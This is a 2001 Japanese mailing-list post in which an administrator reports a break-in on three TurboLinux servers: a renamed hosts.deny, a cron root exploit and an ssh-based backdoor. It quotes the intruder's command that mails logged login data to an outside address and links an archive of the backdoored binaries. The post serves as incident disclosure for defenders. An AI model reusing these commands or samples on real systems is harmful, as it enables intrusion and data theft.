[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[connect24h:02065] はじめまして。やられました(;_;
- To: connect24h@xxxxxxxxxxxxx
- Subject: [connect24h:02065] はじめまして。やられました(;_;
- From: Noriyuki Arisaka <arisa@xxxxxxxxxxxxxxxxx>
- Date: Fri, 09 Mar 2001 23:05:02 +0900
kirei 『ねぇ、見た?このサイト』
suteki 『これでしょう!いいよね♪』
http://www.kadan.ne.jp/bn.cgi?info02
kantan 『お、いいね。早速使おうっと!』
------------------------------------------------------------------------
はじめまして、有坂と申します。
同時期に入れたupdateをたいしてしてない、3台のTurboLinux 3.0,TurboLinux
Server 1.0が同じ手口でやられたんで、このMLに入会させていただきました。
何らかの形で
mv /etc/hosts.deny /etc/host.deny
を実行され一般ユーザで入り、cronのバグをつきrootを取得して
バックドアを仕掛けられたようです。
/dev/sgk/.fsdc/system にログインを記録し、
/dev/pttys で
cat /dev/sgk/.fsdc/system | mail prosupp@xxxxxxx >/dev/null 2>&1
とメールを送っていたようですが、prosupp@xxxxxxxがmessages fullだったみた
いです。現在はアカウントは消えているみたいです。
/usr/sbin/nscd がsshを改変したっぽいバックドアでした。
http://oak.zero.ad.jp/arisa/gomi/hacked.tgz
に改変されたっぽいのをpassword等は編集して削除して2〜3日あげておきます。
参考にしてください。悪用はしないようにお願いします。
(1.2Mほどあるので注意してください。
すみませんが、これからもよろしくお願いします。
--
Noriyuki Arisaka
e-mail: arisa@xxxxxxxxxxxxxxxxx
arisa@xxxxxxxxxxxx
http://oak.zero.ad.jp/arisa/